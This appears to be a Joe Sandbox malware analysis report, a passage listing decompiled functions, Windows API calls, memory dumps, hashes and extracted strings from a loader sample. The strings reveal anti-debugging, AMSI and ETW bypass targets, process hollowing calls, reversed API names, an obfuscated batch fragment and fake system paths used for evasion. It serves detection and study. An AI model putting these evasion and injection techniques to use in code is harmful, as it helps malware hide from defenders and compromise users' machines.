                                                                                                                                      Function 02C48254 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C482C5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                      • API String ID: 2521977463-737317276
                                                                                                                                      • Opcode ID: f2c1816b2a1240c70e47ef0060d2f53b8ff4d4c0364c91907f96afc3186cceff
                                                                                                                                      • Instruction ID: 36307dbee292e845413d3c3ec9938e39132e24f097807f38d3ba528c5d237355
                                                                                                                                      • Opcode Fuzzy Hash: f2c1816b2a1240c70e47ef0060d2f53b8ff4d4c0364c91907f96afc3186cceff
                                                                                                                                      • Instruction Fuzzy Hash: 35016975600208AFEB10EFA8DC41EAF77FEEB49700F414960F808D7600DA70E9109B64
                                                                                                                                      Function 02C47D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C47D74
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                      • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                      • API String ID: 2719805696-3542721025
                                                                                                                                      • Opcode ID: d0e0a57f955e2a7dfaac7d7e20f528569a92baafa90cf5c6a8e22d1b721fb08b
                                                                                                                                      • Instruction ID: 25b224829f9682d1badafaf1f60334875e4e4a6d12f1212474b81060c6ce34b5
                                                                                                                                      • Opcode Fuzzy Hash: d0e0a57f955e2a7dfaac7d7e20f528569a92baafa90cf5c6a8e22d1b721fb08b
                                                                                                                                      • Instruction Fuzzy Hash: 34018CB5610208AFEB10EFA8DC45FAFB7FDEB48700F514820F408D7A80CA70A9149F60
                                                                                                                                      Function 02C484C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 02C48529
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                      • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                      • API String ID: 3503870465-2520021413
                                                                                                                                      • Opcode ID: 1885abc288bd3555802afb84107b3268b4863d88c79648948a015d4fb70baac9
                                                                                                                                      • Instruction ID: 6166b5f20e1162142a0a5916b154a3a61d02b7b8aa2ebb45cb8688601656f3d9
                                                                                                                                      • Opcode Fuzzy Hash: 1885abc288bd3555802afb84107b3268b4863d88c79648948a015d4fb70baac9
                                                                                                                                      • Instruction Fuzzy Hash: 94014B74A40204AFFB15EFA4DC46B5EB7BEFB49B10F914960B40897A40DA70AA10AA60
                                                                                                                                      Function 02C4D9F0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlInitUnicodeString.NTDLL(?,?), ref: 02C4DA6C
                                                                                                                                      • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DABE), ref: 02C4DA82
                                                                                                                                      • NtDeleteFile.NTDLL(?), ref: 02C4DAA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DeleteFileInitStringUnicode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3559453722-0
                                                                                                                                      • Opcode ID: 9d420d2cd237ec896246750985b00462cbdfb39342c7ea844ad94f25a70c4ddf
                                                                                                                                      • Instruction ID: b71fda800dcdb889988fba4649aa244d1cf56b33cf358c38f820a38d7b5e5990
                                                                                                                                      • Opcode Fuzzy Hash: 9d420d2cd237ec896246750985b00462cbdfb39342c7ea844ad94f25a70c4ddf
                                                                                                                                      • Instruction Fuzzy Hash: D6014F75988248AEEB06FAA09941BCE77B9AB45704F5004A3A241E6081DE74AB049B25
                                                                                                                                      Function 02C4DA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C34EDA
                                                                                                                                      • RtlInitUnicodeString.NTDLL(?,?), ref: 02C4DA6C
                                                                                                                                      • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DABE), ref: 02C4DA82
                                                                                                                                      • NtDeleteFile.NTDLL(?), ref: 02C4DAA1
                                                                                                                                        • Part of subcall function 02C34C0C: SysFreeString.OLEAUT32(02C4E950), ref: 02C34C1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: String$AllocDeleteFileFreeInitUnicode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2841551397-0
                                                                                                                                      • Opcode ID: 6a5fcf6f8215be6e873fb128ae07f52ca964285ca88f285c523de84c829bfb63
                                                                                                                                      • Instruction ID: 4890b99a878fa205ed210bfd2895b6a6b4837dff0fef5dba64d4858bbfa16f02
                                                                                                                                      • Opcode Fuzzy Hash: 6a5fcf6f8215be6e873fb128ae07f52ca964285ca88f285c523de84c829bfb63
                                                                                                                                      • Instruction Fuzzy Hash: 3A01EC71A44208AAEB15FAE0DD52FCEB7BDEB48B00F504472A601E6180EB74AB049A64
                                                                                                                                      Function 02C46D50 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C46CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02C46D41,?,?,?,00000000), ref: 02C46D21
                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,02C46E34,00000000,00000000,02C46DB3,?,00000000,02C46E23), ref: 02C46D9F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFromInstanceProg
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2151042543-0
                                                                                                                                      • Opcode ID: 45c33bce37da15703d19256b431596406120267975f071da5f2602af0b081541
                                                                                                                                      • Instruction ID: ce54c19730cf883a3395bfe2f4b23465726eacc8bd253c857aa32102f977f7b5
                                                                                                                                      • Opcode Fuzzy Hash: 45c33bce37da15703d19256b431596406120267975f071da5f2602af0b081541
                                                                                                                                      • Instruction Fuzzy Hash: FF012631208744AEF706DFA4DC5296FBBFDEB4AB10B724835F901E2680EE348E00D960
                                                                                                                                      Function 02C4EC74 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • InetIsOffline.URL(00000000,00000000,02C5AFA1,?,?,?,000002F7,00000000,00000000), ref: 02C4ECAE
                                                                                                                                        • Part of subcall function 02C48824: LoadLibraryA.KERNEL32(00000000,00000000,02C4890B), ref: 02C48858
                                                                                                                                        • Part of subcall function 02C48824: FreeLibrary.KERNEL32(74F60000,00000000,02C91388,Function_000065D8,00000004,02C91398,02C91388,05F5E0FF,00000040,02C9139C,74F60000,00000000,00000000,00000000,00000000,02C4890B), ref: 02C488EB
                                                                                                                                        • Part of subcall function 02C4EB94: GetModuleHandleW.KERNEL32(KernelBase,?,02C4EF98,UacInitialize,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,Initialize), ref: 02C4EB9A
                                                                                                                                        • Part of subcall function 02C4EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02C4EBAC
                                                                                                                                        • Part of subcall function 02C4EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02C4EC00
                                                                                                                                        • Part of subcall function 02C4EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02C4EC12
                                                                                                                                        • Part of subcall function 02C4EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C4EC29
                                                                                                                                        • Part of subcall function 02C37E18: GetFileAttributesA.KERNEL32(00000000,?,02C4F8CC,ScanString,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,UacScan,02C9137C,02C5AFD8,UacInitialize), ref: 02C37E23
                                                                                                                                        • Part of subcall function 02C3C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D858C8,?,02C4FBFE,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession), ref: 02C3C303
                                                                                                                                        • Part of subcall function 02C4DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DC80), ref: 02C4DBEB
                                                                                                                                        • Part of subcall function 02C4DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C4DC80), ref: 02C4DC1B
                                                                                                                                        • Part of subcall function 02C4DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C4DC30
                                                                                                                                        • Part of subcall function 02C4DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C4DC5C
                                                                                                                                        • Part of subcall function 02C4DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C4DC65
                                                                                                                                        • Part of subcall function 02C37E3C: GetFileAttributesA.KERNEL32(00000000,?,02C52A49,ScanString,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,Initialize), ref: 02C37E47
                                                                                                                                        • Part of subcall function 02C37FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02C52BE7,OpenSession,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,Initialize,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8), ref: 02C37FDD
                                                                                                                                        • Part of subcall function 02C4DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DB9E), ref: 02C4DB0B
                                                                                                                                        • Part of subcall function 02C4DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C4DB45
                                                                                                                                        • Part of subcall function 02C4DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C4DB72
                                                                                                                                        • Part of subcall function 02C4DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C4DB7B
                                                                                                                                        • Part of subcall function 02C487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,UacScan), ref: 02C487B4
                                                                                                                                        • Part of subcall function 02C487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C487CE
                                                                                                                                        • Part of subcall function 02C487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize), ref: 02C4880A
                                                                                                                                        • Part of subcall function 02C4870C: LoadLibraryW.KERNEL32(amsi), ref: 02C48715
                                                                                                                                        • Part of subcall function 02C4870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02C48774
                                                                                                                                      • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,02C5B330), ref: 02C549B7
                                                                                                                                        • Part of subcall function 02C4DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 02C4DA6C
                                                                                                                                        • Part of subcall function 02C4DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DABE), ref: 02C4DA82
                                                                                                                                        • Part of subcall function 02C4DA44: NtDeleteFile.NTDLL(?), ref: 02C4DAA1
                                                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 02C54BB7
                                                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 02C54C0D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                                                      • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                                      • API String ID: 3130226682-181751239
                                                                                                                                      • Opcode ID: 584fcee3f222ca36a9c1eeac2af0b8caf54f5117037de40186bf3c5d17542706
                                                                                                                                      • Instruction ID: c8a2980aadec35de7d744c67192e14147b4f3356bf781e7e0f45c486820de084
                                                                                                                                      • Opcode Fuzzy Hash: 584fcee3f222ca36a9c1eeac2af0b8caf54f5117037de40186bf3c5d17542706
                                                                                                                                      • Instruction Fuzzy Hash: 30243275A501688FDB2AEB64DC80ADE73BAFF85300F1045E2E409A7354DA31EE81EF55
                                                                                                                                      Function 02C57878 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771processthreadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 5348 2c57878-2c57c67 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c34898 5463 2c58af1-2c58c74 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c34898 5348->5463 5464 2c57c6d-2c57e40 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c34798 call 2c3494c call 2c34d20 call 2c34d9c CreateProcessAsUserW 5348->5464 5553 2c59420-2c5aa25 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c346a4 * 2 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c346a4 * 2 call 2c48824 